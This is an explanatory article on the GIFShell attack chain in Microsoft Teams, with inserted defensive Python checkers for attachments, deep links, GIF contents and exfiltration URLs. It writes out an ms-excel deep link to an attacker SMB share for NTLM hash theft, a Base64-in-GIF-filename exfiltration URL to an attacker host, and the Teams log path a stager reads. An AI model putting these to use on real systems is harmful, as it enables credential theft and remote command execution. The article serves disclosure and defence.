How the GIFShell Vulnerability Works in Microsoft Teams

Poisonous GIFs: How the GIFShell Vulnerability Works

Attempts to hide malicious content in ordinary image files have been made for a long time, and some of them have even been successful. Recently, BleepingComputer published a report about a new vulnerability that allows attackers to launch a reverse shell in Microsoft Teams using regular GIF files. Let’s take a look at how it works.

Malware Hidden in Images

When we talk about embedding malicious code in image files, we often recall droppers that extract trojan binaries from images saved on disk, or other malware that searches for control commands in images hosted on remote servers. The new attack vector, called GIFShell, is similar to the latter. It allows cybercriminals to exploit weaknesses in the Microsoft Teams platform to launch a reverse shell and execute malicious commands on a compromised computer—all with the help of seemingly ordinary GIF files.

How GIFShell Works

GIFShell isn’t a single vulnerability, but rather a chain of attacks that exploit several flaws in the architecture of Microsoft Teams. In total, seven vulnerabilities were discovered and systematized by independent cybersecurity expert Bobby Rauch. For example, Microsoft Teams users can send each other attachments, and these attachments can load content from external URLs, not just internal SharePoint links. These files may look harmless but can contain nasty surprises. Users have no way to check in advance if an attachment is malicious.

Additionally, Microsoft Teams allows users to upload GIF images from remote servers and send GIF files encoded in HTML Base64, without checking their contents. This means malicious commands can be hidden inside such files. The platform also supports unsafe URI schemes, which can be used to steal SMB NTLM hashes or perform NTLM Relay attacks. Finally, all Microsoft Teams traffic is routed through Microsoft’s servers, making it appear legitimate to antivirus software and thus go undetected. All of this opens up interesting opportunities for hackers.

Sending Malicious Files Across Teams

For security reasons, Microsoft Teams users from one group cannot directly exchange files with members of other groups. The attachment button is missing when messaging someone from another team. However, simple messages can still be sent—and many administrators don’t realize that, by default, Teams users can receive messages from anyone.

When a message with an attachment is sent to a user in the same group, Teams generates a SharePoint link to the file, which is converted to JSON and sent as a POST request to a Teams endpoint. By default, only the sender and recipient can view the link. But Microsoft’s servers don’t check if the SharePoint links in the JSON body point to third-party servers, so the link can be replaced with any URL. This allows an attacker to perform a drive-by download attack. The file format can also be spoofed in the JSON—sending a DLL or EXE instead of an allowed JPEG, for example.

Intermediary servers don’t validate the declared file type either: the recipient will see a JPEG image attached, but without a preview. If the user hovers over the attachment, the file name will be shown, such as Christmas_Party_Photo.jpeg, even if the actual file is named Christmas_Party_Photo.jpeg.............exe.

Because Teams’ JSON messages lack CSRF protection, an attacker can easily automate the sending of malicious messages, for example using a Python module, bypassing Microsoft’s restrictions.

Deep Linking and Unsafe URIs

Microsoft Teams supports deep linking, allowing users to exchange links that trigger certain actions in Teams. For example, to send a chat link, you can use:

msteams://l/chat/0/0?users=<email>

Interestingly, Microsoft’s servers don’t validate deep linking URLs, so almost any URI can be included in a message. For example, a link that downloads a file from an attacker’s site and opens it in Excel on the victim’s machine:

ms-excel:/ofv|u|//10.10.10.10/ROPNOP/filename.xls

When a user opens such a link, SMB handshake data is sent to the attacker’s machine, allowing them to intercept the NTLM hash and relay it to a domain controller.
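The two weaknesses above (attachment JSON whose link and file type are not validated, and deep links with arbitrary URI schemes) can both be caught by inspecting messages before they reach a user. The checker below is an added example, not code from the article or from Bobby Rauch’s proof of concept; it assumes constructed field names (fileName, fileType, url) for an attachment record and treats only https and msteams as expected link schemes.

```python
import re
from typing import List
from urllib.parse import urlparse

# Assumptions for this example: attachment records expose fileName, fileType and url (constructed
# field names, not necessarily Teams' real JSON), legitimate attachment links live on SharePoint or
# Teams hosts, and only https and msteams deep links are expected inside chat messages.
TRUSTED_ATTACHMENT_HOSTS = (".sharepoint.com", "teams.microsoft.com")
ALLOWED_SCHEMES = {"https", "msteams"}
EXT_ALIASES = {"jpg": "jpeg"}

def check_attachment(attachment: dict) -> List[str]:
    """Flag links that leave SharePoint and declared file types that hide the real extension."""
    findings = []
    host = (urlparse(attachment.get("url", "")).hostname or "").lower()
    if not host.endswith(TRUSTED_ATTACHMENT_HOSTS):
        findings.append(f"link host outside SharePoint/Teams: {host or '<none>'}")
    name = attachment.get("fileName", "")
    declared = attachment.get("fileType", "").lower()
    real_ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    declared, real_ext = (EXT_ALIASES.get(e, e) for e in (declared, real_ext))
    if declared and real_ext != declared:
        findings.append(f"declared type {declared!r} but file name ends in {real_ext!r}")
    if re.search(r"\.{2,}\w+$", name):          # e.g. Photo.jpeg.............exe
        findings.append("file name pads its real extension with a run of dots")
    return findings

def check_uri(uri: str) -> List[str]:
    """Flag deep-link URIs outside the scheme allow list or pointing at a //host/share UNC path."""
    findings = []
    parsed = urlparse(uri)
    if parsed.scheme.lower() not in ALLOWED_SCHEMES:
        findings.append(f"unexpected URI scheme {parsed.scheme!r}")
    if re.search(r"//[\w.-]+/", parsed.path) or "\\\\" in uri:
        findings.append("URI references a UNC/SMB path; opening it starts an NTLM handshake")
    return findings
```

Run over the article’s own examples, the spoofed JPEG attachment yields three findings and the ms-excel link two, while a SharePoint-hosted photo and a plain msteams chat link pass clean.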

Teams Log Files: A Goldmine for Attackers

Another boon for hackers is that Microsoft Teams log files, which record all messages and their contents, are stored in plain text on the user’s computer. No admin rights are needed to read these files. For example, in the work or school version of Teams, logs are stored in:

$HOME\AppData\Roaming\Microsoft\Teams\IndexedDB\https_teams.microsoft.com_0.indexeddb.leveldb\*.log

Any malware on the device can access these logs without restriction.

Executing the GIFShell Attack

To successfully execute a GIFShell attack, the attacker first needs to use social engineering to convince the victim to run a malicious stager on their machine. This can be sent as a seemingly harmless JPEG file by modifying the JSON responsible for attachments (as described above) or via a deep linking URL. A proof-of-concept stager is available on Bobby Rauch’s GitHub. The author used Python and PowerShell, but similar programs can be written in any language.

Next, the attacker sends the victim Base64-encoded GIF files containing the desired system commands. These GIFs appear as normal images in Teams and are saved to the log file along with the message. The stager on the victim’s computer scans the logs, finds GIF/Base64 images, decodes them, and executes the hidden Base64 commands using PowerShell.
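Since Teams accepts Base64 GIFs without checking their contents, a defender can do that check instead: walk the GIF block structure and report anything that is not image data. The walker below is an added example, not code from the article or from the proof of concept; it uses a standard 1x1 transparent GIF as constructed sample input and reports the two places a GIF can carry arbitrary bytes, comment extension blocks and data appended after the trailer (a message blob is first decoded with base64.b64decode, as the constant shows).

```python
import base64

TINY_GIF_B64 = "R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"  # standard 1x1 transparent GIF
TINY_GIF = base64.b64decode(TINY_GIF_B64)

def _read_sub_blocks(data: bytes, pos: int):
    """Collect GIF data sub-blocks starting at pos; return (payload, position after the 0x00 terminator)."""
    out = bytearray()
    while pos < len(data):
        size = data[pos]
        pos += 1
        if size == 0:
            break
        out += data[pos:pos + size]
        pos += size
    return bytes(out), pos

def inspect_gif(data: bytes) -> list:
    """Walk the GIF block structure and report places where non-image data can ride along."""
    findings = []
    if len(data) < 13 or data[:6] not in (b"GIF87a", b"GIF89a"):
        return ["not a GIF"]
    pos = 13                                  # header + logical screen descriptor
    if data[10] & 0x80:                       # global colour table present
        pos += 3 * (2 ** ((data[10] & 0x07) + 1))
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                     # trailer: a valid image ends here
            if pos < len(data):
                findings.append(f"{len(data) - pos} bytes appended after the GIF trailer")
            break
        if block == 0x21:                     # extension block: label byte + sub-blocks
            label = data[pos]
            payload, pos = _read_sub_blocks(data, pos + 1)
            if label == 0xFE:                 # comment extension: free-form text
                findings.append(f"comment extension carries text: {payload[:40]!r}")
        elif block == 0x2C:                   # image descriptor: 9 bytes, optional local colour table, LZW data
            lflags = data[pos + 8]
            pos += 9
            if lflags & 0x80:
                pos += 3 * (2 ** ((lflags & 0x07) + 1))
            _, pos = _read_sub_blocks(data, pos + 1)   # +1 skips the LZW minimum code size
        else:
            findings.append(f"unknown block 0x{block:02x} at offset {pos - 1}")
            break
    else:
        findings.append("no GIF trailer found")
    return findings
```

A clean image returns an empty list; any finding is reason to quarantine the message rather than render it.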

Half the job is done: the attacker has executed a command on the victim’s computer. But they also need to receive the command output. To do this, the stager monitors command execution and then creates a URL like http://<attacker-ip>/<base64-encoded-command-output>.gif, where attacker-ip is the attacker’s server and base64-encoded-command-output is the Base64-encoded output. This URL is packed into a Microsoft Teams “poll card” (a JSON message) and sent to the Teams servers.

When the Microsoft server receives this card, it contacts the attacker’s node (using the IP in the URL) and tries to download the GIF file. The file name contains the Base64-encoded command output, which the attacker can decode. For example, a file named dGhlIHVzZXIgaXM6IA0KYm9iYnlyYXVjaDYyNzRcYm9iYnlyYXVJa0K.gif decodes to the output of the whoami command run on the victim’s device:

the user is: 
bobbyrauch6274\bobbyrauIkBáë

This convoluted method creates an effective reverse shell, as demonstrated in the author’s video.

Attackers can send the victim many GIF images containing commands and receive information about their execution. Since all this data passes through Microsoft Teams servers and looks like normal app traffic, antivirus and firewalls don’t block or filter it, giving attackers free rein. And since Teams runs as a background process, the user doesn’t even need to open the app window for malicious commands to execute on their computer.
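The exfiltration channel has a recognisable shape: an outbound poll card whose GIF URL has a long Base64 file name that decodes to readable text. The scanner below is an added example, not code from the article or the proof of concept; it runs over constructed log text (the first URL carries the file name quoted in the article, the second is an ordinary GIF link that must not be flagged) and could be pointed at the local Teams log files described above.

```python
import base64
import re
import string
from typing import List, Optional, Tuple

# A GIF URL whose file name stem is long enough to be a Base64 blob rather than a real image name.
GIF_URL = re.compile(r"https?://[^\s\"'<>]+/([A-Za-z0-9+=_-]{16,})\.gif", re.IGNORECASE)
PRINTABLE = set(string.printable)

def decode_if_text(stem: str) -> Optional[str]:
    """Return the stem decoded as Base64 (standard or URL-safe alphabet) if the result reads as text."""
    padded = stem + "=" * (-len(stem) % 4)
    try:
        raw = base64.urlsafe_b64decode(padded)   # also accepts '+' from the standard alphabet
    except ValueError:                           # binascii.Error is a ValueError subclass
        return None
    text = raw.decode("utf-8", errors="replace")
    if len(text) >= 8 and sum(c in PRINTABLE for c in text) / len(text) > 0.9:
        return text
    return None

def find_exfil_urls(log_text: str) -> List[Tuple[str, str]]:
    """Scan message/log text for GIF URLs whose file name decodes to readable command output."""
    hits = []
    for m in GIF_URL.finditer(log_text):
        decoded = decode_if_text(m.group(1))
        if decoded is not None:
            hits.append((m.group(0), decoded))
    return hits

# Constructed sample resembling what a local Teams log might record for a poll card (not the real
# log format); 203.0.113.10 is a documentation address standing in for the attacker's server.
SAMPLE_LOG = """
{"type":"poll","image":"http://203.0.113.10/dGhlIHVzZXIgaXM6IA0KYm9iYnlyYXVjaDYyNzRcYm9iYnlyYXVJa0K.gif"}
{"type":"message","image":"https://media.example.com/stickers/9f8e7d6c5b4a3f2e1d0c.gif"}
"""
```

Because the Base64 file name in the article is truncated, the decoded text ends mid-username, exactly as the article’s own decoding does.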

Microsoft’s Response and User Recommendations

Bobby Rauch informed Microsoft about these vulnerabilities in May and June 2022, but the company did not consider them critical, allowing the researcher to publish his findings. All the described attacks worked on Microsoft Teams version 1.5.00.11163 and are guaranteed to work on earlier versions. BleepingComputer’s administrators contacted Microsoft for comments on fixing these vulnerabilities and received the following response: “Some vulnerabilities of low severity that do not pose an immediate threat to users are not prioritized for immediate security updates, but the possibility of fixing them will be considered in a future software version.”

In other words, Microsoft is in no hurry to fix these security issues, so attackers may continue to exploit them. Therefore, Microsoft Teams users should be especially cautious and vigilant if they want to avoid falling victim to hackers.
